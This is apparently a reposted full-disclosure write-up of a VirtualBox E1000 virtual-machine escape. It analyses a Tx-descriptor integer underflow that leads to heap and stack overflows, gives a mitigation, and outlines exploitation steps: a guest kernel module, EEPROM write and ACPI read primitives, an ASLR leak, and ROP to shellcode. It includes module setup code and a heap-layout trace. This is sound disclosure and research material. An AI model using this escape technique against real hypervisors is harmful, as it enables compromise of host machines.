VirtualBox E1000 0day Virtual Machine Escape Vulnerability (full text updated)

 

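VirtualBox 0day virtual machine escape vulnerability published on GitHub

Not long ago, the details of a VirtualBox virtual machine escape vulnerability were published on GitHub. The author says they like VirtualBox but strongly disagree with the current state of the information security industry, bug bounty programs in particular. The author lists four complaints: 1. Long turnaround: a submitted vulnerability can take half a year to get through the whole process. 2. Instability: something settled today may be reversed tomorrow. 3. Imprecise lists of software in scope. 4. Too much marketing. The author's response is full disclosure: publish every vulnerability found as a 0day, in the belief that this pushes information security forward. (This does not represent the views of the editor or of Anquanke.)

So far the author has not tried to sell the vulnerability, which says something about how blunt they are.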

 

Basic information

Affected versions: VirtualBox 5.2.20 and earlier

Host OS: any

Guest OS: any

VM configuration: default (network adapter Intel PRO/1000 MT Desktop (82540EM), network mode NAT)

 

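Overview

The default virtual network device in VirtualBox is the 82540EM mentioned above (in NAT mode), referred to below as E1000.

E1000 has a vulnerability that lets an attacker with root/administrator privileges in the guest escape to host ring 3, and then escalate to ring 0 by other means (/dev/vboxdrv).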

 

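Mitigation

Change the virtual machine's network adapter to PCnet or to Paravirtualized Network. If the adapter cannot be changed, switch the mode from NAT to another mode (the former option is more secure).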

 

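Vulnerability details

E1000

To send network packets, a guest does what an ordinary host does: it configures the network card and supplies packets to it. A packet is a data link layer frame plus higher-level headers. Packets supplied to the adapter are wrapped in Tx descriptors (Tx means transmit). The Tx descriptor is a data structure described in the 82540EM datasheet (317453006EN.PDF, Revision 4.0); it holds packet metadata such as packet size, VLAN tag, and TCP/IP segmentation flags.

The 82540EM datasheet defines three Tx descriptor types: legacy, context, and data. Legacy is largely deprecated; the other two are the ones in common use. What matters here is that a context descriptor sets the maximum packet size and switches TCP/IP segmentation, while a data descriptor holds the physical address and size of the packet data. The packet size in a data descriptor must be smaller than the maximum packet size set by the context descriptor, and the context descriptor is normally supplied to the network card before the data descriptors.

To supply Tx descriptors to the network card, the guest writes them into the Tx Ring, a ring buffer in physical memory at a predefined address. Once all descriptors are written to the Tx Ring, the guest updates the E1000 MMIO TDT register (Transmit Descriptor Tail) to tell the host that there are new descriptors to process.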
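The producer/consumer relationship described above can be illustrated with a toy ring in C. This is only a sketch: the ring size, the `tx_ring` structure, and the helper names are hypothetical and do not come from VirtualBox or the datasheet; real descriptors are 16-byte structures, not single integers.

```c
#include <assert.h>
#include <stdint.h>

#define RING_SLOTS 8u  /* hypothetical ring size; the real one is configured via TDLEN */

/* Toy model of a transmit ring: the producer (guest) owns the tail,
 * the consumer (device) owns the head. */
struct tx_ring {
    uint64_t slots[RING_SLOTS]; /* stand-in for real descriptors        */
    uint32_t head;              /* next slot the device will consume    */
    uint32_t tail;              /* next slot the guest will fill        */
};

/* Guest side: place one descriptor and advance the tail.
 * Returns 0 on success, -1 if the ring is full. */
int ring_push(struct tx_ring *r, uint64_t desc)
{
    uint32_t next = (r->tail + 1u) % RING_SLOTS;
    if (next == r->head)
        return -1;              /* one slot stays empty to tell full from empty */
    r->slots[r->tail] = desc;
    r->tail = next;             /* on real hardware: write the new tail to TDT */
    return 0;
}

/* Device side: number of descriptors waiting between head and tail. */
uint32_t ring_pending(const struct tx_ring *r)
{
    return (r->tail + RING_SLOTS - r->head) % RING_SLOTS;
}
```

Pushing five descriptors and then reading `ring_pending` yields five pending entries, which mirrors the guest writing five descriptors and then bumping TDT once.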

Input

Suppose the guest supplies the following array of Tx descriptors:

[context_1, data_2, data_3, context_4, data_5]

and suppose their fields are set as follows:

context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true

data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true

data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true
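For readers who prefer code, the same five descriptors can be written as a C array. This is a simplified sketch: the `tx_desc` structure uses the field names from this article, not the bit layout from the datasheet or the `E1KTXDESC` type in VirtualBox.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

enum desc_type { DESC_CONTEXT, DESC_DATA };

/* Simplified descriptor: field names follow the article, not the hardware layout. */
struct tx_desc {
    enum desc_type type;
    uint8_t  header_length;            /* context descriptors only */
    uint16_t maximum_segment_size;     /* context descriptors only */
    uint32_t data_length;              /* data descriptors only    */
    bool     end_of_packet;            /* data descriptors only    */
    bool     tcp_segmentation_enabled;
};

const struct tx_desc example_descs[5] = {
    /* context_1 */
    { .type = DESC_CONTEXT, .header_length = 0,
      .maximum_segment_size = 0x3010, .tcp_segmentation_enabled = true },
    /* data_2 */
    { .type = DESC_DATA, .data_length = 0x10,
      .end_of_packet = false, .tcp_segmentation_enabled = true },
    /* data_3: empty, but it closes the first packet */
    { .type = DESC_DATA, .data_length = 0,
      .end_of_packet = true, .tcp_segmentation_enabled = true },
    /* context_4: MSS smaller than the 0x10 bytes already accumulated */
    { .type = DESC_CONTEXT, .header_length = 0,
      .maximum_segment_size = 0xF, .tcp_segmentation_enabled = true },
    /* data_5 */
    { .type = DESC_DATA, .data_length = 0x4188,
      .end_of_packet = true, .tcp_segmentation_enabled = true },
};
```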

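The analysis follows.

Root cause analysis

Processing [context_1, data_2, data_3]

Assume the descriptors above are written to the Tx Ring in the given order and the TDT register is updated. The host then executes the e1kXmitPending function in src/VBox/Devices/Network/DevE1000.cpp.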

static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
        while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
        {
            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

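e1kTxDLazyLoad reads all five Tx descriptors from the Tx Ring, and then e1kLocateTxPacket is called. That function walks the descriptors to set up initial state but does not actually process them. Its first call handles context_1, data_2, and data_3. The remaining two descriptors are handled in the second iteration of the while loop (covered in the next section). This two-part handling is essential for triggering the vulnerability.

e1kLocateTxPacket looks like this: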

static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
    for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
        switch (e1kGetDescType(pDesc))
        {
            case E1K_DTYP_CONTEXT:
                e1kUpdateTxContext(pThis, pDesc);
                continue;
            case E1K_DTYP_LEGACY:
                ...
                break;
            case E1K_DTYP_DATA:
                if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
                    break;
                ...
                break;
            default:
                AssertMsgFailed(("Impossible descriptor type!"));
        }

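context_1 is of type E1K_DTYP_CONTEXT, so e1kUpdateTxContext is called. That function updates the TCP segmentation context if TCP segmentation is enabled for the descriptor, which is the case here.

data_2 is of type E1K_DTYP_DATA; what is done for it is not relevant here and is not discussed.

data_3 is handled the same way, but because data_3.data_length == 0 nothing is done for it.

At this point three descriptors have gone through initial processing and two remain. After the switch statement, the end_of_packet field of the descriptor is checked. For data_3 it is true, so the function performs some actions and returns.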

        if (pDesc->legacy.cmd.fEOP)
        {
            ...
            return true;
        }

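If end_of_packet were false here, e1kLocateTxPacket would go on to handle the remaining two descriptors in the same pass, and the vulnerability would not be triggered.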
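The packet-boundary behaviour can be sketched in a few lines of C. This is a simplified model of the scan, not the VirtualBox code: `mini_desc` and `locate_packet_end` are hypothetical names, and everything except the context/end-of-packet distinction is left out.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct mini_desc {
    bool is_context;     /* context descriptors never end a packet */
    bool end_of_packet;  /* meaningful for data descriptors only   */
};

/* Scan from `start` and return the index one past the descriptor that
 * closes the packet, or 0 if no end-of-packet descriptor was fetched. */
size_t locate_packet_end(const struct mini_desc *d, size_t start, size_t fetched)
{
    for (size_t i = start; i < fetched; i++) {
        if (d[i].is_context)
            continue;        /* context: state is updated, scanning goes on */
        if (d[i].end_of_packet)
            return i + 1;    /* packet boundary found, stop here */
    }
    return 0;                /* incomplete packet */
}
```

With the five example descriptors, the first scan stops after index 2 (data_3) and a second scan starting at index 3 covers context_4 and data_5. If data_3 did not carry end_of_packet, a single scan would run through all five.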

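When e1kLocateTxPacket returns, the three descriptors are ready to be unpacked and sent. The inner loop of e1kXmitPending then calls e1kXmitPacket, which iterates over the fetched descriptors (five in this case) to actually process them.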

static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
    while (pThis->iTxDCurrent < pThis->nTxDFetched)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
        ...
        rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
        ...
        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;
    }

e1kXmitDesc is called for each descriptor.

static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
                       bool fOnWorkerThread)
{
...
    switch (e1kGetDescType(pDesc))
    {
        case E1K_DTYP_CONTEXT:
            ...
            break;
        case E1K_DTYP_DATA:
        {
            ...
            if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
            {
                E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
            }
            else
            {
                if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
                {
                    ...
                }
                else if (!pDesc->data.cmd.fTSE)
                {
                    ...
                }
                else
                {
                    STAM_COUNTER_INC(&pThis->StatTxPathFallback);
                    rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
                }
            }
            ...

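The first descriptor passed to this function is context_1; nothing is done with it here.

The second descriptor is data_2. Because every data descriptor has tcp_segmentation_enabled == true (pDesc->data.cmd.fTSE), e1kFallbackAddToFrame is called. This is the function in which the integer underflow occurs later, when data_5 is processed.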

static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
    ...
    uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;

    /*
     * Carve out segments.
     */
    int rc = VINF_SUCCESS;
    do
    {
        /* Calculate how many bytes we have left in this TCP segment */
        uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            /* This descriptor fits completely into current segment */
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
        else
        {
            ...
        }

        pDesc->data.u64BufAddr    += cb;
        pDesc->data.cmd.u20DTALEN -= cb;
    } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));

    if (pDesc->data.cmd.fEOP)
    {
        ...
        pThis->u16TxPktLen = 0;
        ...
    }

    return VINF_SUCCESS; /// @todo consider rc;
}

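The important variables here are u16MaxPktLen, pThis->u16TxPktLen, and pDesc->data.cmd.u20DTALEN.

The table below shows the values of these variables before and after e1kFallbackAddToFrame for each data descriptor.

Tx Descriptor  Before/After  u16MaxPktLen  pThis->u16TxPktLen  pDesc->data.cmd.u20DTALEN
data_2         Before        0x3010        0                   0x10
data_2         After         0x3010        0x10                0
data_3         Before        0x3010        0x10                0
data_3         After         0x3010        0x10                0

The point to note is that pThis->u16TxPktLen is 0x10 when data_3 is processed, and it is still 0x10 afterwards. Judging from the e1kXmitDesc excerpt above, a data descriptor with zero length is skipped, so the end-of-packet reset (pThis->u16TxPktLen = 0) in e1kFallbackAddToFrame is apparently never reached for data_3.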

Next, look again at the end of the loop in e1kXmitPacket.

        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;

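Because data_3 is not E1K_DTYP_CONTEXT and data_3.end_of_packet == true, the loop breaks even though the last two descriptors have not been processed. This matters because context descriptors are meant to be processed before data descriptors: context descriptors are handled in e1kLocateTxPacket, when the TCP segmentation context is updated, and data descriptors are handled afterwards in the loop inside e1kXmitPacket. The developers' intent was to prevent u16MaxPktLen from changing while data is being processed, which would otherwise allow an integer underflow in the following line: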

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;

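This protection can be bypassed, however. In e1kLocateTxPacket, data_3.end_of_packet == true forces the function to return, which leaves two descriptors (context_4 and data_5) waiting to be processed. Since pThis->u16TxPktLen is 0x10 at that point rather than 0, context_4.maximum_segment_size can be used to change u16MaxPktLen and cause the integer underflow.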
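A small state model in C makes the bypass easier to follow. It is a deliberately simplified sketch: `tx_state`, `apply_context`, and `apply_data` are hypothetical names, segmentation of oversized data is ignored, and the only behaviour carried over from the excerpts is that empty data descriptors are skipped and that the packet length is reset at end of packet.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

struct tx_state {
    uint16_t max_pkt_len;  /* header length + MSS from the latest context */
    uint16_t tx_pkt_len;   /* bytes accumulated for the current packet    */
};

/* Context descriptor: replaces the current maximum packet length. */
void apply_context(struct tx_state *s, uint8_t hdr_len, uint16_t mss)
{
    s->max_pkt_len = (uint16_t)(hdr_len + mss);
}

/* Data descriptor: empty descriptors are skipped entirely, so the
 * end-of-packet reset is not reached for them. */
void apply_data(struct tx_state *s, uint32_t len, bool end_of_packet)
{
    if (len == 0)
        return;
    s->tx_pkt_len = (uint16_t)(s->tx_pkt_len + len);
    if (end_of_packet)
        s->tx_pkt_len = 0;
}
```

Feeding context_1, data_2, and data_3 into this model leaves `tx_pkt_len` at 0x10; applying context_4 afterwards sets `max_pkt_len` to 0xF, which is now smaller than the accumulated length.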

Processing [context_4, data_5]

Back in the loop in e1kXmitPending:

            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

This time e1kLocateTxPacket performs the initial processing of context_4 and data_5. context_4.maximum_segment_size can be set to a value smaller than the size of the data already read (0x10):

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

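During this call to e1kLocateTxPacket the maximum segment size becomes 0xF, while the size of the data already read is 0x10.

When data_5 is processed and e1kFallbackAddToFrame runs, the variables are as follows:

Tx Descriptor  Before/After  u16MaxPktLen  pThis->u16TxPktLen  pDesc->data.cmd.u20DTALEN
data_5         Before        0xF           0x10                0x4188
data_5         After         -             -                   -

This causes the integer underflow: u16MaxPktLen - pThis->u16TxPktLen is 0xF - 0x10, which wraps around to 0xFFFFFFFF when stored in the uint32_t variable cb.

Since 0xFFFFFFFF > 0x4188, the following branch is taken: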

        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
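The arithmetic behind the wraparound can be reproduced in isolation. The sketch below uses the same expression shape as the line in e1kFallbackAddToFrame; the function names are hypothetical, and the guarded variant is only an illustration of one possible check, not the fix that was shipped. It assumes a platform where int is wider than 16 bits.

```c
#include <assert.h>
#include <stdint.h>

/* Both operands are uint16_t, so they are promoted to int; the possibly
 * negative difference is then converted to uint32_t and wraps around. */
uint32_t bytes_left_unchecked(uint16_t max_pkt_len, uint16_t tx_pkt_len)
{
    uint32_t cb = max_pkt_len - tx_pkt_len;
    return cb;
}

/* Hypothetical guarded variant: refuse the subtraction when it would wrap. */
int bytes_left_checked(uint16_t max_pkt_len, uint16_t tx_pkt_len, uint32_t *out)
{
    if (tx_pkt_len > max_pkt_len)
        return -1;
    *out = (uint32_t)(max_pkt_len - tx_pkt_len);
    return 0;
}
```

With the values from the table, `bytes_left_unchecked(0xF, 0x10)` yields 0xFFFFFFFF, so the comparison against the 0x4188-byte descriptor length succeeds.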

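e1kFallbackAddSegment is therefore called with a size of 0x4188. Without the vulnerability it would be impossible to call it with a size above 0x4000, because the TCP segmentation context update in e1kUpdateTxContext checks that the maximum segment size is less than or equal to 0x4000.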

DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
        uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
        if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
        {
            pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
            ...
        }
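The clamp above only enforces an upper bound, which is why a tiny value such as 0xF passes through untouched. A standalone sketch of the same logic follows; the constant 0x3FA0 is an assumption taken from the aTxPacketFallback buffer size quoted in this article, and `clamp_mss` is a hypothetical helper name.

```c
#include <assert.h>
#include <stdint.h>

#define MAX_TX_PKT_SIZE 0x3FA0u  /* assumed value, based on the buffer size quoted in the article */
#define VTAG_BYTES      4u       /* room reserved for the VLAN tag */

/* Return the MSS after clamping so that MSS + header + VLAN tag fits. */
uint16_t clamp_mss(uint16_t mss, uint8_t hdr_len)
{
    uint32_t total = (uint32_t)mss + hdr_len + VTAG_BYTES;
    if (total > MAX_TX_PKT_SIZE)
        return (uint16_t)(MAX_TX_PKT_SIZE - hdr_len - VTAG_BYTES);
    return mss;
}
```

Nothing in this check relates the new MSS to the number of bytes already accumulated for the current packet, so it does not prevent the underflow described earlier.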

Buffer overflow

Once e1kFallbackAddSegment has been called with a size of 0x4188, there are two ways to abuse it. First, data is read from the guest into a heap buffer:

static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
    ...
    PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                      pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

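Here pThis->aTxPacketFallback is a buffer of size 0x3FA0 and u16Len is 0x4188, so the read runs past the end of the buffer and can overwrite, for example, function pointers.

Second, e1kFallbackAddSegment calls e1kTransmitFrame, which, with a suitable configuration of the E1000 registers, calls e1kHandleRxPacket. That function allocates a stack buffer of size 0x4000 and copies data of the given length (0x4188 here) into it: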

static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
    uint8_t   rxPacket[E1K_MAX_RX_PKT_SIZE];
    ...
    if (status.fVP)
    {
        ...
    }
    else
        memcpy(rxPacket, pvBuf, cb);

Both overflows, the heap one and the stack one, can be exploited.
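To get a feel for the sizes involved, the helper below computes how many bytes land past the end of a buffer. It is a plain arithmetic sketch with a hypothetical function name; the figures passed to it in the note that follows are the ones quoted in this article (heap buffer 0x3FA0 with 0x10 bytes already accumulated, stack buffer 0x4000, copy length 0x4188).

```c
#include <assert.h>
#include <stddef.h>

/* Bytes written past the end of a `capacity`-byte buffer when `len` bytes
 * are copied to it starting at `offset`; 0 when the copy fits. */
size_t bytes_past_end(size_t capacity, size_t offset, size_t len)
{
    size_t end = offset + len;
    return end > capacity ? end - capacity : 0;
}
```

Under those figures, `bytes_past_end(0x3FA0, 0x10, 0x4188)` gives 0x1F8 bytes beyond the heap buffer and `bytes_past_end(0x4000, 0, 0x4188)` gives 0x188 bytes beyond the stack buffer.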

 

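Exploit

The exploit is a Linux kernel module (LKM) that is loaded in the guest OS. On Windows, a driver that differs only slightly from the LKM would be needed.

Loading a driver requires elevated privileges on both operating systems, but this is usually not a major obstacle; situations of this kind are common at recent Pwn2Own contests, for example.

The exploit is very reliable and does not fail for odd reasons. It works on Ubuntu 16.04 and 18.04 x86_64 with the default configuration.

Exploitation steps

1. The attacker unloads the e1000.ko module that is loaded by default in the Linux guest and loads the exploit's LKM.

2. The LKM initializes E1000 according to the datasheet. Only the transmit half needs to be initialized.

3.1. The LKM disables E1000 loopback mode so that the stack buffer overflow code is unreachable.

3.2. The LKM uses the vulnerability to cause the heap buffer overflow.

3.3. The heap buffer overflow lets the attacker use the E1000 EEPROM to write two arbitrary bytes within a 128 KB range, which gives a write primitive.

3.4. The LKM uses the write primitive 8 times to write into an ACPI (Advanced Configuration and Power Interface) data structure on the heap. The bytes are written to the index variable of a heap buffer from which a single byte is then read. Because the buffer is smaller than the maximum index value (255), the attacker can read past the buffer, which gives a read primitive.

3.5. The LKM uses the read primitive 8 times to access ACPI and read 8 bytes from the heap: a pointer into the VBoxDD.so shared library.

3.6. The LKM subtracts the RVA from the pointer to obtain the VBoxDD.so image base.

4.1. The LKM enables E1000 loopback mode so that the stack buffer overflow code is reachable.

4.2. The LKM uses the vulnerability to cause the stack buffer overflow. The saved return address (RIP/EIP) is overwritten and the attacker gains control.

4.3. A ROP chain is used to execute the shellcode loader.

5.1. The shellcode loader copies the shellcode from the stack and executes it.

5.2. The shellcode uses the fork and execve system calls to spawn a process.

6. The attacker unloads the LKM, loads e1000.ko again, and restores networking.

Initialization

The LKM maps the physical memory of the E1000 MMIO region. The physical address and size are predefined by the hypervisor.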

void* map_mmio(void) {
    off_t pa = 0xF0000000;
    size_t len = 0x20000;

    void* va = ioremap(pa, len);
    if (!va) {
        printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
        return NULL;
    }

    return va;
}

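Next, the general-purpose E1000 registers are configured, memory for the Tx Ring is allocated, and the transmit registers are configured.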

void e1000_init(void* mmio) {
    // Configure general purpose registers

    configure_CTRL(mmio);

    // Configure TX registers

    g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
    if (!g_tx_ring) {
        printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
        return;
    }

    configure_TDBAL(mmio);
    configure_TDBAH(mmio);
    configure_TDLEN(mmio);
    configure_TCTL(mmio);
}

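ASLR bypass

Write primitive

When writing the exploit, I decided not to use primitives from services that are disabled by default, such as Chromium (the service that provides 3D acceleration, in which more than 40 vulnerabilities were found last year).

The task was therefore to find an information leak in the default VirtualBox subsystems. Generally speaking, once the integer underflow leads to a heap buffer overflow, everything past the buffer is under the attacker's control. Read, write, and information leak primitives can all be derived from that.

Let's look at what gets overflowed on the heap: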

/**
 * Device state structure.
 */
struct E1kState_st
{
...
    uint8_t     aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
    E1kEEPROM   eeprom;
...
}

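Here aTxPacketFallback is the buffer of size 0x3FA0. Among the fields that follow it in the structure, one interesting candidate is E1kEEPROM, which contains the following structure: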

/**
 * 93C46-compatible EEPROM device emulation.
 */
struct EEPROM93C46
{
...
    bool m_fWriteEnabled;
    uint8_t Alignment1;
    uint16_t m_u16Word;
    uint16_t m_u16Mask;
    uint16_t m_u16Addr;
    uint32_t m_u32InternalWires;
...
}

E1000 implements an EEPROM, an auxiliary adapter memory. The guest can access it through E1000 MMIO registers. Only the EEPROM write operation is of interest here:

EEPROM93C46::State EEPROM93C46::opWrite()
{
    storeWord(m_u16Addr, m_u16Word);
    return WAITING_CS_FALL;
}

void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
    if (m_fWriteEnabled) {
        E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
        m_au16Data[u32Addr] = u16Value;
    }
    m_u16Mask = DATA_MSB;
}

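Here m_u16Addr, m_u16Word, and m_fWriteEnabled are fields of the EEPROM93C46 structure that we control. The statement

m_au16Data[u32Addr] = u16Value;

writes two bytes at an arbitrary 16-bit offset from m_au16Data. This is the write primitive.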
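The 128 KB figure follows directly from the types: a 16-bit index into an array of 16-bit words. The sketch below models the store against a flat byte arena; `store_word` and `REACH_BYTES` are hypothetical names, and the bounds check exists only to keep the model itself memory-safe.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* A uint16_t index into uint16_t elements covers 65536 * 2 bytes. */
#define REACH_BYTES ((size_t)(UINT16_MAX + 1u) * sizeof(uint16_t))

/* Model: `base` is where the word array starts inside a flat byte arena.
 * Returns 0 when the word was stored, -1 when writes are disabled or the
 * target falls outside the arena used by this model. */
int store_word(uint8_t *arena, size_t arena_len, size_t base,
               uint16_t addr, uint16_t value, int write_enabled)
{
    size_t off = base + (size_t)addr * sizeof(uint16_t);
    if (!write_enabled || off + sizeof(uint16_t) > arena_len)
        return -1;
    memcpy(arena + off, &value, sizeof value);
    return 0;
}
```

Since the attacker controls the address, the value, and the write-enable flag after the overflow, every 2-byte slot within `REACH_BYTES` of the array start becomes writable in this model.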

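Read primitive

The next problem is to find a data structure on the heap to write arbitrary data to, with the goal of leaking a pointer into a shared library. Heap spraying can be avoided, because the main data structures of the virtual devices are allocated from an internal hypervisor heap and the distances between them are constant.

When the virtual machine starts, the PDM (Pluggable Device and Driver Manager) subsystem allocates PDMDEVINS objects in the hypervisor heap.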

int pdmR3DevInit(PVM pVM)
{
...
        PPDMDEVINS pDevIns;
        if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
            rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
        else
            rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...

Tracing this part of the code under GDB gives the following result:

[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8

[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8

...

[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0

[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848

[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728

[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570

[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90

[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
